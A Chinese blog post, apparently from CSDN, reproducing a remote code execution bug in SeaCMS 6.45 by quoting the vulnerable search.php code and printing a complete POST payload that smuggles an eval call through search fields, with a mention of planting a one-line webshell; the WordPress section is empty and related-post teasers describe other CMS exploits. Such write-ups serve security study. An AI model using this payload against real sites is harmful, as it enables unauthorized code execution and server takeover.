seacms和wordpress漏洞复现

最新推荐文章于 2024-08-05 19:49:17 发布
最新推荐文章于 2024-08-05 19:49:17 发布
阅读量1k 收藏
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37432787/article/details/82840916
版权

seacms-6.45

安装
版本:6.45
源码下载
到安装说明里面将其安装,如果安装了wamp或者phpstudy应该很简单了,不赘述。

一些需要知道的小知识

str_replace('a','b',$content)是将$content中的'a'替换成'b'
join(数组a)是将a中的元素拼接成一个字符串
addslashes($a)转义a的每个双引号
strpos($a,$b)在$a中查找$b第一次出现的位置,未找到则为false

search.php源码解析

提取关键代码:

关键代码1:
$whereStr.=" and v_publishyear='$year'";
$whereStr.=" and v_letter='$letter'";
$whereStr.=" and v_publisharea='$area'";
$whereStr.=" and v_lang='$yuyan'";
$whereStr.=" and v_jq like'%$jq%'";
$whereStr.=" and v_ver='$ver'";

关键代码2:
$content = str_replace("{searchpage:type}",$tid,$content);
$content = str_replace("{searchpage:typename}",$tname ,$content);
$content = str_replace("{searchpage:year}",$year,$content);
$content = str_replace("{searchpage:area}",$area,$content);
$content = str_replace("{searchpage:letter}",$letter,$content);
$content = str_replace("{searchpage:lang}",$yuyan,$content);
$content = str_replace("{searchpage:jq}",$jq,$content);
if($state=='w'){$state2="完结";}elseif($state=='l'){$state2="连载中";}else{$state2="全部";}
if($money=='m'){$money2="免费";}elseif($money=='s'){$money2="收费";}else{$money2="全部";}
$content = str_replace("{searchpage:state}",$state2,$content);
$content = str_replace("{searchpage:money}",$money2,$content);
$content = str_replace("{searchpage:ver}",$ver,$content);

构造初步post内容:

searchtype=5&searchword={searchpage:year}&year=:e{searchpage:area}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=print_r(scandir("."));

main.class.php源码解析

在这里插入图片描述
content是调用了此函数,追踪此函数:

在这里插入图片描述第一个红框:$content必须含有’{if:’
第二个红框:这里不是很看得懂,就当做是把{if: }去除吧
第三个红框(应该是上一个eval,懒得改了):执行双eval

第三个红框那里等同于以下代码:

<?php
if(eval(join($_POST[9])))
{
	$flag=1;
}
else
{
	$flag=0;
}
?>

在这里插入图片描述
最终构造提交

最终构造内容为:

&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=print_r(scandi&9[]=r("."));

在这里插入图片描述
一句话木马

在这里插入图片描述在这里插入图片描述
到v6.56为止此类任意代码执行漏洞才暂时没有了。

wordpress

xixixihhh
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Seacms漏洞分析利用复现 By Assassin
Assassin
08-03 9788
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms的漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
CMS漏洞复现
x594238758的博客
09-10 3792
CMS是英语Content Management System的缩写,按英语的字面翻译就是内容管理系统,顾名思义,它主要是为了方便发布网络内容而存在的一体化Web管理系统。很久很久以前,人们做网站很多用静态HTML+CSS+Javascript直接写,也就是静态页面。
seacms admin_ip.php RCE (CVE-2022-48093) 漏洞复现
weixin_68999845的博客
07-31 565
改内容写入的是 .php 文件内的,观察请求的payload是否是恶意的php语句,分析其作用,在本地测试即可(若写入一句话木马,用antswords连接.php文件观察是否成功即可)1.下载源码到本地:https://github.com/seacms-com/seacms。1.登录后台(在配置环境时,后台地址时随机生成的,本次地址为:seacms-master/源码下载url:https://github.com/seacms-com/seacms。以下版本受该漏洞影响:seacms全版本。
漏洞复现WordPress——Recall——SQL注入(CVE-2024-32709)
LongL_GuYu的博客
07-11 788
Plechev Andrey WP-Recall存在SQL注入漏洞。该漏洞影响WP-Recall版本从n/a到16.26.5。攻击者可以利用该漏洞在SQL命令中不恰当地中立化特殊元素,造成数据库被恶意操作的风险。
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
WordPress扫描程序:WordPress漏洞扫描程序
02-05
用PHP编写的Wordpress扫描仪,侧重于漏洞评估和Wordpress安装中错误配置的安全审核。 Wordpress Scanner能够发现Wordpress安装中的缺陷,并将提供有关该漏洞的所有信息。 Wordpress Scanner不是用于代码审核的工具,...
wordpress建站和DM系统区块
08-15
wordpress建站和DM系统区块是一款使用DM系统的区块功能,让wordpress建站更方便的PHP建站系统。 DM系统的优势就是区块功能。现在把DM的区块功能做为插件,用在wordpress系统上。 分类和内容
漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1705
seaCms-命令执行】后门代码写入可解析文件中
CMS V5.7 SP2漏洞复现(CVE-2018-20129)
haoaaao的博客
04-04 4756
0x00 前置 1、CVE中对该漏洞的描述: 在 DedeCMS V5.7 SP2 中发现了一个问题。uploads/include/dialog/select_images_post.php 允许远程攻击者通过双扩展名和修改的“.php”子字符串以及 image/jpeg 内容类型上传和执行任意 PHP 代码,如 filename=1 所示。 jpg.p*hp 值。 2、所需工具 (1)cms网站源码版本:DedeCMS V5.7 SP2 下载链接...
74CMS漏洞复现
小小猪的博客
12-01 4208
74CMS漏洞复现 漏洞描述: 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围: 74CMS_v5.0.1 版本低于6.0.48 环境复现: 这里采用安鸾渗透实战平台的靶机 地址 漏洞复现: 访问http://www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl发现报错 访问 www.whalwl.site:8019/in..
YzmCMS跨站脚本漏洞(CVE-2020-22394)复现
玄道的网安博客
11-28 4683
简介 YzmCMS基于 PHP 的轻量级开源内容管理系统。 漏洞概述 YzmCMS v5.5版本存在跨站脚本漏洞,该漏洞源于编辑器中的member contribution function包含一个跨站点脚本(XSS)漏洞。 影响版本 YzmCMS v5.5 环境搭建 到官网下载源码 https://www.yzmcms.com/ 好像官网最近访问不了了,放个百度网盘的 https://pan.baidu.com/s/1y8_4FrGlUUrV0-LaGWJhWA 安装完成后 .
CMS-GetShell漏洞复现
最新发布
2401_86440467的博客
08-05 1633
使用虚拟机为centos7.6确保docker与docker-compose已安装(如果有需要或者有时间,会做一篇安装流程)下载靶场git clone https://github.com/vulhub/vulhub.git(我这里已经下载,不再演示)进入 /vulhub/wordpress/pwnscriptum 目录下;使用命令docker-compose up -d 开启环境如果启动失败,vim docker-compose.yml修改将上面改为2.1,下面为端口自己随便选择一个未占用即可。
帝国CMS7.5漏洞复现
qq_52469895的博客
04-11 2513
首先去它的后台 http://127.0.0.1/upload/e/admin/index.php 账号密码root 依次 -> [系统]-[系统设置]-[备份与恢复数据]-[备份数据] 抓包把tablename改为phpifno() 注意这里只勾选一个就行了 然后点击备份开始抓包 将tablename改为phpifno 然后放包 看到这里就是刚刚的数据 查看备份说明然后将文件目录下的config.php,将readme.txt改为config.php
cmseasy漏洞复现
qq_52223347的博客
03-10 4458
介绍 提供可视化编辑企业网站管理系统系统、网站模板、以及相关文档资料下载,网站系统完美运 行PHP7环境中。 官方网站: https://www.cmseasy.cn/ cmseasy_7.3.8 任意文件操作漏洞复现 cmseasy_7.6.3.2逻辑漏洞复现 "无需代码,自由拖拽布局,适应所有设备”是这个系统宣传的特色,后台自然地 存在自定义网站模板功能,这种功能中如果处理不当很可能造成文件任意读、写 或者删除的脆弱性问题,需要着重注意。 一 任意文件操作漏洞复现 进入管理界面–》模块 --》编辑模
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 784
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
WordPress Rank Math SEO插件元数据修改漏洞复现
为了复现这个漏洞,攻击者首先需创建一个名为"test"的用户,并将其角色设为订阅者。然后,他们可以通过访问特定的API路径,执行未经授权的操作,从而修改与用户相关的元数据,对网站的安全构成严重威胁。 对于网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值